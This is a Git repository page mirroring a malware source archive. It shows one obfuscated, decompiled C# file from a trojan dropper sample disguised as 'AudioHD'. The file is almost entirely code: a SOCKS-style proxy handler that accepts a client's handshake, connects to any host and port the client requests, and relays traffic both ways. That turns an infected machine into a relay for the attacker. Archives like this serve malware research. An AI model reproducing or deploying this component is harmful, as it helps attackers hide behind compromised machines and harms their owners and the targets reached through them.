ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-22 19:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
71cdcf7dce
MalwareSourceCode/MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0008/_0007.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

128 lines
4.1 KiB
C#
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// Decompiled with JetBrains decompiler
// Type: .
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
using \u0001;
using \u0008;
using System;
using System.Net;
using System.Net.Sockets;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
namespace \u0008
{
internal sealed class \u0007
{
[NonSerialized]
internal static \u0002 \u0001;
private TcpClient \u0001;
private TcpClient \u0002;
private byte \u0001 = 5;
private byte \u0002;
private byte \u0003;
private byte \u0004 = 1;
private byte \u0005 = 3;
public \u0007([In] TcpClient obj0) => this.\u0001 = obj0;
public void \u000F()
{
NetworkStream stream1 = this.\u0001.GetStream();
byte[] buffer1 = new byte[2];
stream1.Read(buffer1, 0, 2);
byte[] buffer2 = new byte[(int) buffer1[1]];
stream1.Read(buffer2, 0, buffer2.Length);
byte[] buffer3 = new byte[2]
{
this.\u0001,
this.\u0002
};
stream1.Write(buffer3, 0, 2);
byte[] buffer4 = new byte[4];
stream1.Read(buffer4, 0, 4);
string hostname = \u0007.\u0001(940);
if ((int) buffer4[3] == (int) this.\u0004)
{
byte[] numArray = new byte[4];
stream1.Read(numArray, 0, 4);
hostname = new IPAddress(numArray).ToString();
}
else if ((int) buffer4[3] == (int) this.\u0005)
{
byte[] buffer5 = new byte[1];
stream1.Read(buffer5, 0, 1);
byte[] numArray = new byte[(int) buffer5[0]];
stream1.Read(numArray, 0, (int) buffer5[0]);
hostname = Encoding.Default.GetString(numArray);
}
if (!(hostname != \u0007.\u0001(940)))
return;
byte[] buffer6 = new byte[2];
stream1.Read(buffer6, 0, 2);
int uint16 = (int) BitConverter.ToUInt16(new byte[2]
{
buffer6[1],
buffer6[0]
}, 0);
Console.WriteLine(\u0007.\u0001(2546) + hostname + \u0007.\u0001(1788) + uint16.ToString());
this.\u0002 = new TcpClient(hostname, uint16);
if (!this.\u0002.Connected)
return;
byte[] buffer7 = new byte[10];
buffer7[0] = this.\u0001;
buffer7[1] = this.\u0003;
buffer7[2] = (byte) 0;
buffer7[3] = (byte) 1;
IPAddress ipAddress = IPAddress.Parse(this.\u0002.Client.LocalEndPoint.ToString().Split(':')[0]);
buffer7[4] = ipAddress.GetAddressBytes()[0];
buffer7[5] = ipAddress.GetAddressBytes()[1];
buffer7[6] = ipAddress.GetAddressBytes()[2];
buffer7[7] = ipAddress.GetAddressBytes()[3];
int num = int.Parse(this.\u0002.Client.LocalEndPoint.ToString().Split(':')[1]);
buffer7[8] = BitConverter.GetBytes((ushort) num)[0];
buffer7[9] = BitConverter.GetBytes((ushort) num)[1];
stream1.Write(buffer7, 0, 10);
NetworkStream stream2 = this.\u0002.GetStream();
bool flag = false;
while (this.\u0002.Connected && this.\u0001.Connected && !flag)
{
Thread.Sleep(100);
try
{
if (stream1.DataAvailable)
{
byte[] numArray1 = new byte[10000];
int length = stream1.Read(numArray1, 0, 10000);
byte[] numArray2 = new byte[length];
Array.Copy((Array) numArray1, (Array) numArray2, length);
stream2.Write(numArray2, 0, numArray2.Length);
}
if (stream2.DataAvailable)
{
byte[] numArray3 = new byte[10000];
int length = stream2.Read(numArray3, 0, 10000);
byte[] numArray4 = new byte[length];
Array.Copy((Array) numArray3, (Array) numArray4, length);
stream1.Write(numArray4, 0, numArray4.Length);
}
}
catch
{
flag = true;
}
}
if (this.\u0001.Connected)
this.\u0001.Close();
if (!this.\u0002.Connected)
return;
this.\u0002.Close();
}
static \u0007() => \u0003.\u000F();
}
}
Reference in New Issue View Git Blame Copy Permalink